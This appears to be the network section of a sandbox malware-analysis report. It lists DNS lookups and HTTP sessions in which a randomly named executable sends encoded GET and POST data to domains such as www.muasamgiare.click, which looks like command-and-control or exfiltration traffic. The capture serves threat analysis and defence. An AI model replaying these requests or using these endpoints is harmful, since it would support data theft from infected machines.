                                                                    Jan 10, 2025 21:31:01.046214104 CET53582291.1.1.1192.168.2.6
                                                                    Jan 10, 2025 21:31:05.009227991 CET5559853192.168.2.61.1.1.1
                                                                    Jan 10, 2025 21:31:05.454762936 CET53555981.1.1.1192.168.2.6
                                                                    Jan 10, 2025 21:31:22.229120016 CET5001253192.168.2.61.1.1.1
                                                                    Jan 10, 2025 21:31:22.755218983 CET53500121.1.1.1192.168.2.6
                                                                    Jan 10, 2025 21:31:36.416125059 CET5794153192.168.2.61.1.1.1
                                                                    Jan 10, 2025 21:31:36.772914886 CET53579411.1.1.1192.168.2.6
                                                                    Jan 10, 2025 21:31:50.090981007 CET5549853192.168.2.61.1.1.1
                                                                    Jan 10, 2025 21:31:50.202056885 CET53554981.1.1.1192.168.2.6
                                                                    Jan 10, 2025 21:31:58.323627949 CET5985053192.168.2.61.1.1.1
                                                                    Jan 10, 2025 21:31:58.364725113 CET53598501.1.1.1192.168.2.6
                                                                    Jan 10, 2025 21:32:11.683439970 CET6454653192.168.2.61.1.1.1
                                                                    Jan 10, 2025 21:32:11.732824087 CET53645461.1.1.1192.168.2.6
                                                                    Jan 10, 2025 21:32:24.917421103 CET6407853192.168.2.61.1.1.1
                                                                    Jan 10, 2025 21:32:25.573565960 CET53640781.1.1.1192.168.2.6
                                                                    Jan 10, 2025 21:32:39.652617931 CET5268353192.168.2.61.1.1.1
                                                                    Jan 10, 2025 21:32:39.676583052 CET53526831.1.1.1192.168.2.6
                                                                    Jan 10, 2025 21:32:53.385942936 CET6182953192.168.2.61.1.1.1
                                                                    Jan 10, 2025 21:32:53.616056919 CET53618291.1.1.1192.168.2.6
                                                                    Jan 10, 2025 21:33:07.480551004 CET5073553192.168.2.61.1.1.1
                                                                    Jan 10, 2025 21:33:07.531820059 CET53507351.1.1.1192.168.2.6
                                                                    Jan 10, 2025 21:33:20.683286905 CET6180053192.168.2.61.1.1.1
                                                                    Jan 10, 2025 21:33:20.697514057 CET53618001.1.1.1192.168.2.6

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Jan 10, 2025 21:31:05.009227991 CET192.168.2.61.1.1.10xd8d8Standard query (0)www.7261ltajbc.bondA (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 21:31:22.229120016 CET192.168.2.61.1.1.10xde04Standard query (0)www.muasamgiare.clickA (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 21:31:36.416125059 CET192.168.2.61.1.1.10xc323Standard query (0)www.kkpmoneysocial.topA (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 21:31:50.090981007 CET192.168.2.61.1.1.10xc1f6Standard query (0)www.artkub.netA (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 21:31:58.323627949 CET192.168.2.61.1.1.10x523bStandard query (0)www.happyjam.lifeA (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 21:32:11.683439970 CET192.168.2.61.1.1.10x4ed0Standard query (0)www.123hellodrive.shopA (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 21:32:24.917421103 CET192.168.2.61.1.1.10x2d0aStandard query (0)www.zoomlive.liveA (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 21:32:39.652617931 CET192.168.2.61.1.1.10x1601Standard query (0)www.dietcoffee.onlineA (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 21:32:53.385942936 CET192.168.2.61.1.1.10x3630Standard query (0)www.guacamask.onlineA (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 21:33:07.480551004 CET192.168.2.61.1.1.10x8edbStandard query (0)www.appsolucao.shopA (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 21:33:20.683286905 CET192.168.2.61.1.1.10xa93cStandard query (0)www.aziziyeescortg.xyzA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Jan 10, 2025 21:31:05.454762936 CET1.1.1.1192.168.2.60xd8d8No error (0)www.7261ltajbc.bond154.12.28.184A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 21:31:22.755218983 CET1.1.1.1192.168.2.60xde04No error (0)www.muasamgiare.clickdns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 10, 2025 21:31:22.755218983 CET1.1.1.1192.168.2.60xde04No error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 21:31:22.755218983 CET1.1.1.1192.168.2.60xde04No error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 21:31:36.772914886 CET1.1.1.1192.168.2.60xc323No error (0)www.kkpmoneysocial.top104.21.16.1A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 21:31:36.772914886 CET1.1.1.1192.168.2.60xc323No error (0)www.kkpmoneysocial.top104.21.96.1A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 21:31:36.772914886 CET1.1.1.1192.168.2.60xc323No error (0)www.kkpmoneysocial.top104.21.64.1A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 21:31:36.772914886 CET1.1.1.1192.168.2.60xc323No error (0)www.kkpmoneysocial.top104.21.112.1A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 21:31:36.772914886 CET1.1.1.1192.168.2.60xc323No error (0)www.kkpmoneysocial.top104.21.48.1A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 21:31:36.772914886 CET1.1.1.1192.168.2.60xc323No error (0)www.kkpmoneysocial.top104.21.32.1A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 21:31:36.772914886 CET1.1.1.1192.168.2.60xc323No error (0)www.kkpmoneysocial.top104.21.80.1A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 21:31:58.364725113 CET1.1.1.1192.168.2.60x523bNo error (0)www.happyjam.life209.74.77.107A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 21:32:11.732824087 CET1.1.1.1192.168.2.60x4ed0No error (0)www.123hellodrive.shop123hellodrive.shopCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 10, 2025 21:32:11.732824087 CET1.1.1.1192.168.2.60x4ed0No error (0)123hellodrive.shop84.32.84.32A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 21:32:25.573565960 CET1.1.1.1192.168.2.60x2d0aNo error (0)www.zoomlive.live154.208.202.225A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 21:32:39.676583052 CET1.1.1.1192.168.2.60x1601No error (0)www.dietcoffee.online77.68.64.45A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 21:32:53.616056919 CET1.1.1.1192.168.2.60x3630No error (0)www.guacamask.online208.91.197.27A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 21:33:07.531820059 CET1.1.1.1192.168.2.60x8edbNo error (0)www.appsolucao.shopappsolucao.shopCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 10, 2025 21:33:07.531820059 CET1.1.1.1192.168.2.60x8edbNo error (0)appsolucao.shop84.32.84.32A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 21:33:20.697514057 CET1.1.1.1192.168.2.60xa93cNo error (0)www.aziziyeescortg.xyz104.21.80.1A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 21:33:20.697514057 CET1.1.1.1192.168.2.60xa93cNo error (0)www.aziziyeescortg.xyz104.21.96.1A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 21:33:20.697514057 CET1.1.1.1192.168.2.60xa93cNo error (0)www.aziziyeescortg.xyz104.21.48.1A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 21:33:20.697514057 CET1.1.1.1192.168.2.60xa93cNo error (0)www.aziziyeescortg.xyz104.21.16.1A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 21:33:20.697514057 CET1.1.1.1192.168.2.60xa93cNo error (0)www.aziziyeescortg.xyz104.21.64.1A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 21:33:20.697514057 CET1.1.1.1192.168.2.60xa93cNo error (0)www.aziziyeescortg.xyz104.21.32.1A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 21:33:20.697514057 CET1.1.1.1192.168.2.60xa93cNo error (0)www.aziziyeescortg.xyz104.21.112.1A (IP address)IN (0x0001)false

                                                                    HTTP Request Dependency Graph

                                                                    • www.7261ltajbc.bond
                                                                    • www.muasamgiare.click
                                                                    • www.kkpmoneysocial.top
                                                                    • www.happyjam.life
                                                                    • www.123hellodrive.shop
                                                                    • www.zoomlive.live
                                                                    • www.dietcoffee.online
                                                                    • www.guacamask.online
                                                                    • www.appsolucao.shop
                                                                    • www.aziziyeescortg.xyz

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.664216154.12.28.184802496C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 21:31:05.476617098 CET491OUTGET /vt4e/?bJMLqbS=VWo59DE7z/zpNvlQrGwQqnlKKikmhHzFU/awM9upW87Yx15oShf3plLjnAS2lxJKaRtg2RYIywQ4d8OifO+Rpmij5Ffq0kXSJKVYpR6npO/nbInFwrm8n/2iwd1ApVHfxnTP7ZY=&xHrti=IpSlbxE0jR HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.7261ltajbc.bond
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Jan 10, 2025 21:31:07.184508085 CET691INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Fri, 10 Jan 2025 20:31:06 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 548
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                    Jan 10, 2025 21:31:07.185071945 CET691INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Fri, 10 Jan 2025 20:31:06 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 548
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                    Jan 10, 2025 21:31:07.186158895 CET691INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Fri, 10 Jan 2025 20:31:06 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 548
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.66421818.139.62.226802496C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 21:31:22.794205904 CET759OUTPOST /bsye/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.muasamgiare.click
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Origin: http://www.muasamgiare.click
                                                                    Referer: http://www.muasamgiare.click/bsye/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Raw: 62 4a 4d 4c 71 62 53 3d 72 65 50 77 37 6d 4a 50 72 72 43 43 4b 57 55 2f 4e 7a 4e 49 41 6a 69 41 6f 6d 6a 5a 31 73 64 4b 41 45 79 49 51 58 79 35 4f 43 75 76 75 59 30 6f 62 46 46 45 61 46 6d 6e 69 7a 61 33 70 48 39 58 72 6f 4d 48 39 57 65 7a 59 73 58 48 74 5a 63 46 56 78 2b 38 63 7a 38 68 4f 31 71 46 6d 7a 41 58 6c 61 38 74 59 64 59 68 4e 73 66 6c 70 64 35 73 36 6b 42 56 71 35 68 4e 78 68 52 53 45 51 63 34 30 6c 4b 36 4a 6f 73 38 50 77 6a 65 66 50 42 6a 4e 46 78 4e 33 34 43 4d 37 48 32 78 71 6d 43 4b 34 56 44 76 4b 4d 57 62 46 45 41 2f 4b 50 6e 34 32 4b 2f 56 4a 5a 33 59 4b 62 56 53 42 45 72 4e 4f 54 4d 4b 6b 51 44 4f 42 4b 4e 31
                                                                    Data Ascii: bJMLqbS=rePw7mJPrrCCKWU/NzNIAjiAomjZ1sdKAEyIQXy5OCuvuY0obFFEaFmniza3pH9XroMH9WezYsXHtZcFVx+8cz8hO1qFmzAXla8tYdYhNsflpd5s6kBVq5hNxhRSEQc40lK6Jos8PwjefPBjNFxN34CM7H2xqmCK4VDvKMWbFEA/KPn42K/VJZ3YKbVSBErNOTMKkQDOBKN1
                                                                    Jan 10, 2025 21:31:23.748260021 CET368INHTTP/1.1 301 Moved Permanently
                                                                    Server: openresty
                                                                    Date: Fri, 10 Jan 2025 20:31:23 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Location: https://www.muasamgiare.click/bsye/
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.66421918.139.62.226802496C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 21:31:25.350195885 CET783OUTPOST /bsye/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.muasamgiare.click
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Origin: http://www.muasamgiare.click
                                                                    Referer: http://www.muasamgiare.click/bsye/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Raw: 62 4a 4d 4c 71 62 53 3d 72 65 50 77 37 6d 4a 50 72 72 43 43 59 6d 45 2f 4c 53 4e 49 49 6a 69 50 6e 47 6a 5a 2f 4d 64 52 41 45 4f 49 51 57 32 70 4f 30 32 76 75 35 45 6f 61 45 46 45 5a 46 6d 6e 71 54 61 79 6e 6e 39 51 72 6f 52 34 39 58 79 7a 59 73 72 48 74 62 55 46 56 6d 71 37 4f 54 38 6a 48 56 72 6a 37 6a 41 58 6c 61 38 74 59 64 4d 48 4e 73 48 6c 70 74 4a 73 37 42 31 57 6d 5a 68 4f 6e 78 52 53 41 51 63 30 30 6c 4c 76 4a 70 67 43 50 79 72 65 66 4f 78 6a 4d 58 5a 4d 69 49 43 4b 6b 58 33 67 73 55 6a 37 69 33 65 35 41 73 6d 67 47 56 45 38 50 35 36 69 71 35 2f 32 62 4a 58 61 4b 5a 4e 67 42 6b 72 6e 4d 54 30 4b 32 48 50 70 4f 2b 6f 57 37 47 6f 42 77 68 43 4d 73 39 34 70 74 53 57 2f 6a 43 7a 76 6d 77 3d 3d
                                                                    Data Ascii: bJMLqbS=rePw7mJPrrCCYmE/LSNIIjiPnGjZ/MdRAEOIQW2pO02vu5EoaEFEZFmnqTaynn9QroR49XyzYsrHtbUFVmq7OT8jHVrj7jAXla8tYdMHNsHlptJs7B1WmZhOnxRSAQc00lLvJpgCPyrefOxjMXZMiICKkX3gsUj7i3e5AsmgGVE8P56iq5/2bJXaKZNgBkrnMT0K2HPpO+oW7GoBwhCMs94ptSW/jCzvmw==
                                                                    Jan 10, 2025 21:31:26.287628889 CET368INHTTP/1.1 301 Moved Permanently
                                                                    Server: openresty
                                                                    Date: Fri, 10 Jan 2025 20:31:26 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Location: https://www.muasamgiare.click/bsye/
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.66422018.139.62.226802496C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 21:31:27.907691956 CET1796OUTPOST /bsye/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.muasamgiare.click
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1248
                                                                    Connection: close
                                                                    Origin: http://www.muasamgiare.click
                                                                    Referer: http://www.muasamgiare.click/bsye/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Raw: 62 4a 4d 4c 71 62 53 3d 72 65 50 77 37 6d 4a 50 72 72 43 43 59 6d 45 2f 4c 53 4e 49 49 6a 69 50 6e 47 6a 5a 2f 4d 64 52 41 45 4f 49 51 57 32 70 4f 30 4f 76 70 50 59 6f 63 6e 39 45 59 46 6d 6e 67 7a 61 7a 6e 6e 38 4d 72 6f 4a 30 39 58 75 4a 59 70 76 48 73 2b 41 46 41 6a 47 37 58 6a 38 6a 59 46 72 33 6d 7a 41 47 6c 61 74 46 59 64 63 48 4e 73 48 6c 70 72 46 73 38 55 42 57 67 5a 68 4e 78 68 52 65 45 51 64 72 30 68 65 59 4a 70 6b 53 50 47 66 65 66 75 68 6a 42 43 46 4d 2b 59 43 49 6e 58 33 34 73 55 76 67 69 33 43 39 41 75 47 47 47 58 59 38 4f 65 6e 43 35 49 66 63 49 5a 4c 37 57 71 4e 68 46 54 7a 49 4a 41 51 30 6d 33 2f 2b 45 74 59 36 32 43 30 70 6c 43 33 32 74 62 63 4c 6e 53 76 73 69 51 6d 48 2b 34 4a 4d 31 6b 55 6f 7a 6e 2f 75 75 6f 62 32 6d 71 51 5a 75 68 79 34 69 4b 78 41 52 75 4a 58 35 6e 64 45 57 63 62 46 31 4d 4e 76 76 71 48 38 30 46 31 63 2b 61 75 70 63 58 7a 50 76 6a 2f 79 49 69 74 44 65 4f 32 49 52 42 51 4e 62 77 59 67 65 36 58 77 67 50 74 68 45 56 36 4c 63 54 6d 36 77 77 4f 30 67 64 2b 42 4d 34 [TRUNCATED]
                                                                    Data Ascii: bJMLqbS=rePw7mJPrrCCYmE/LSNIIjiPnGjZ/MdRAEOIQW2pO0OvpPYocn9EYFmngzaznn8MroJ09XuJYpvHs+AFAjG7Xj8jYFr3mzAGlatFYdcHNsHlprFs8UBWgZhNxhReEQdr0heYJpkSPGfefuhjBCFM+YCInX34sUvgi3C9AuGGGXY8OenC5IfcIZL7WqNhFTzIJAQ0m3/+EtY62C0plC32tbcLnSvsiQmH+4JM1kUozn/uuob2mqQZuhy4iKxARuJX5ndEWcbF1MNvvqH80F1c+aupcXzPvj/yIitDeO2IRBQNbwYge6XwgPthEV6LcTm6wwO0gd+BM4SLJKwEk6Jn4Evsz03zDQYSIdCAJVxnNyWjqqnu4GEfa5W5omOuelW+B5xGm+7oZpsb3ORI5M2VWnQ1uDAqh9MBu7gkBSHVGQv4ymdmw2ouPlRDY9IM3m78SYvoN3uvbmGoWiwtR4TdEatMWbJgkH/737gd3ogmCcGVCqmQHARqd+gLpCMdS07VifSdt9mJyjY4Ho1cIiCYkAo9XFl5u0l95sM8aExBPSXd/vOy4Ja6A8GJ1ikPehJsqYTCxPMl+35STU80E+qx1IwVZsrZlXJnQ59idPu94YPokNDRCOtcQubkBmiQylsTnHMaI+0OLAXdNOUczKIklPUR4E1voEv6Xfrve5SGbYgezU3RI79pzGllgaJcvZpBlDaiwis0MCyR2spmDdnBPvXmF/0BE+dfI+1gZufqxgmWKJPpOoDoP+/+6R5DSdNyXO5CaP1+MCzYhHVw1X33MZ4OmrUIrwSIA8V1m+/rQMUC7MW4gFBq/ay+unUrU8UVe9Xt33jQ25x97CCvGEDw3hbGzbfZ4lgYk9461VzoZvJ9TIVvrIdGHiv17nX2m6C4qolGwHZGKnjikSJCCyG9SeYk1ozKTeGKWLIl65GNw83S+G+dNvVVdKTp/d9/5ghiAPao8ScBwpKuEAjgDCbiaeWLpKtJklQYwxVBVKtPpdj7 [TRUNCATED]
                                                                    Jan 10, 2025 21:31:28.841588020 CET368INHTTP/1.1 301 Moved Permanently
                                                                    Server: openresty
                                                                    Date: Fri, 10 Jan 2025 20:31:28 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Location: https://www.muasamgiare.click/bsye/
